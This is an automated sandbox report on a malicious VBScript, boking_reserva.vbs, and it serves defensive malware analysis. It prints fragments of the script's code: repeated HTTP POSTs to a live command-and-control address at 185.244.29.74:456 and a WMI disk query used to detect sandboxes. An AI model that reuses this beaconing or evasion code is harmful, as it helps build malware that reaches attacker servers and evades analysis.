Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
boking_reserva.vbs

Overview

General Information

Sample name:boking_reserva.vbs
Analysis ID:1523399
MD5:6f8754b579376036b8fdaab9de8db283
SHA1:bd1e0f525fc8999ce95e17a3ef4cf17de6d1e7be
SHA256:abf22ba8a61b3bff907f60b92713e03a09e2607fb5b56e05723149f2108f8871
Tags:185-244-29-74vbsuser-JAMESWT_MHT
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
AI detected suspicious sample
Potential malicious VBS script found (has network functionality)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Detected TCP or UDP traffic on non-standard ports
Found URL in obfuscated visual basic script code
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Program does not show much activity (idle)
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Classification

  • System is w10x64
  • wscript.exe (PID: 5828 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\boking_reserva.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 185.244.29.74, DestinationIsIpv6: false, DestinationPort: 456, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5828, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49699
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\boking_reserva.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\boking_reserva.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\boking_reserva.vbs", ProcessId: 5828, ProcessName: wscript.exe
Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 185.244.29.74, DestinationIsIpv6: false, DestinationPort: 456, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5828, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49699
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\boking_reserva.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\boking_reserva.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\boking_reserva.vbs", ProcessId: 5828, ProcessName: wscript.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.1% probability

Networking

barindex
Source: C:\Windows\System32\wscript.exeNetwork Connect: 185.244.29.74 456Jump to behavior
Source: Initial file: xx.open "POST", "http://185.244.29.74:456/document", False:xx.setrequestheader "User-Agent", gg:xx.send
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 456
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 185.244.29.74:456
Source: boking_reserva.vbsBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
Source: boking_reserva.vbsBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4
Source: Joe Sandbox ViewASN Name: DAVID_CRAIGGG DAVID_CRAIGGG
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownHTTP traffic detected: POST /document HTTP/1.1Accept: */*User-Agent: B81A4609Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 185.244.29.74:456Content-Length: 0Connection: Keep-AliveCache-Control: no-cache
Source: wscript.exe, 00000000.00000002.3722607572.0000020DA68B2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238956045.0000020DA85E4000.00000004.00000020.00020000.00000000.sdmp, boking_reserva.vbsString found in binary or memory: http://185.244.29.74:456/document
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA9260000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.244.29.74:456/document&
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.244.29.74:456/document0
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.244.29.74:456/document609
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.244.29.74:456/documentEncoding:
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.244.29.74:456/documenta
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.244.29.74:456/documentcept-Encoding:
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.244.29.74:456/documentd
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA9260000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.244.29.74:456/documentf
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA9260000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.244.29.74:456/documenti
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.244.29.74:456/documentj
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.244.29.74:456/documentn
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com

System Summary

barindex
Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: boking_reserva.vbsInitial sample: Strings found which are bigger than 50
Source: classification engineClassification label: mal84.troj.evad.winVBS@1/0@0/1
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\boking_reserva.vbs"
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: responseText();IHost.Sleep("3100");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IHost.CreateObject("wscript.shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("3100");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("3100");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IHost.CreateObject("wscript.shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("3100");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("3100");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("3100");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IHost.CreateObject("wscript.shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("3100");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("3100");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2

Hooking and other Techniques for Hiding and Protection

barindex
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 456
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA9260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW\
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA9312000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.3723630420.0000020DA9260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\wscript.exeNetwork Connect: 185.244.29.74 456Jump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information231
Scripting
Valid Accounts1
Windows Management Instrumentation
231
Scripting
1
Process Injection
1
Process Injection
OS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System11
Non-Standard Port
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
DLL Side-Loading
LSASS Memory2
System Information Discovery
Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
NameMaliciousAntivirus DetectionReputation
http://185.244.29.74:456/documenttrue
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://185.244.29.74:456/documentawscript.exe, 00000000.00000002.3723630420.0000020DA92DD000.00000004.00000020.00020000.00000000.sdmpfalse
      unknown
      http://185.244.29.74:456/documentdwscript.exe, 00000000.00000002.3723630420.0000020DA92DD000.00000004.00000020.00020000.00000000.sdmpfalse
        unknown
        http://185.244.29.74:456/document&wscript.exe, 00000000.00000002.3723630420.0000020DA9260000.00000004.00000020.00020000.00000000.sdmpfalse
          unknown
          http://185.244.29.74:456/documentfwscript.exe, 00000000.00000002.3723630420.0000020DA9260000.00000004.00000020.00020000.00000000.sdmpfalse
            unknown
            http://185.244.29.74:456/documentjwscript.exe, 00000000.00000002.3723630420.0000020DA92DD000.00000004.00000020.00020000.00000000.sdmpfalse
              unknown
              http://185.244.29.74:456/documentEncoding:wscript.exe, 00000000.00000002.3723630420.0000020DA92F9000.00000004.00000020.00020000.00000000.sdmpfalse
                unknown
                http://185.244.29.74:456/documentiwscript.exe, 00000000.00000002.3723630420.0000020DA9260000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  http://185.244.29.74:456/documentnwscript.exe, 00000000.00000002.3723630420.0000020DA92DD000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    http://185.244.29.74:456/document609wscript.exe, 00000000.00000002.3723630420.0000020DA92F9000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      http://185.244.29.74:456/document0wscript.exe, 00000000.00000002.3723630420.0000020DA92F9000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        http://185.244.29.74:456/documentcept-Encoding:wscript.exe, 00000000.00000002.3723630420.0000020DA92F9000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          185.244.29.74
                          unknownNetherlands
                          209623DAVID_CRAIGGGtrue
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1523399
                          Start date and time:2024-10-01 15:17:05 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 5m 56s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:16
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:boking_reserva.vbs
                          Detection:MAL
                          Classification:mal84.troj.evad.winVBS@1/0@0/1
                          EGA Information:Failed
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Found application associated with file extension: .vbs
                          • Override analysis time to 240s for JS/VBS files not yet terminated
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • VT rate limit hit for: boking_reserva.vbs
                          No simulations
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          185.244.29.74Passport.vbsGet hashmaliciousUnknownBrowse
                          • 185.244.29.74:456/document
                          No context
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          DAVID_CRAIGGGPassport.vbsGet hashmaliciousUnknownBrowse
                          • 185.244.29.74
                          ExeFile (351).exeGet hashmaliciousQuasarBrowse
                          • 91.193.75.100
                          PO-4ADB89.batGet hashmaliciousAgentTeslaBrowse
                          • 185.244.30.19
                          Ozb8aojWew.exeGet hashmaliciousGuLoaderBrowse
                          • 185.244.30.5
                          P0-ADFUK.bat.exeGet hashmaliciousGuLoaderBrowse
                          • 185.244.30.5
                          9y5FW1JvLf.exeGet hashmaliciousRemcosBrowse
                          • 185.140.53.144
                          ORDER-245140097DF.jsGet hashmaliciousAsyncRATBrowse
                          • 185.165.153.116
                          SecuriteInfo.com.Linux.Kaiji.16.13149.10467.elfGet hashmaliciousChaosBrowse
                          • 185.140.53.36
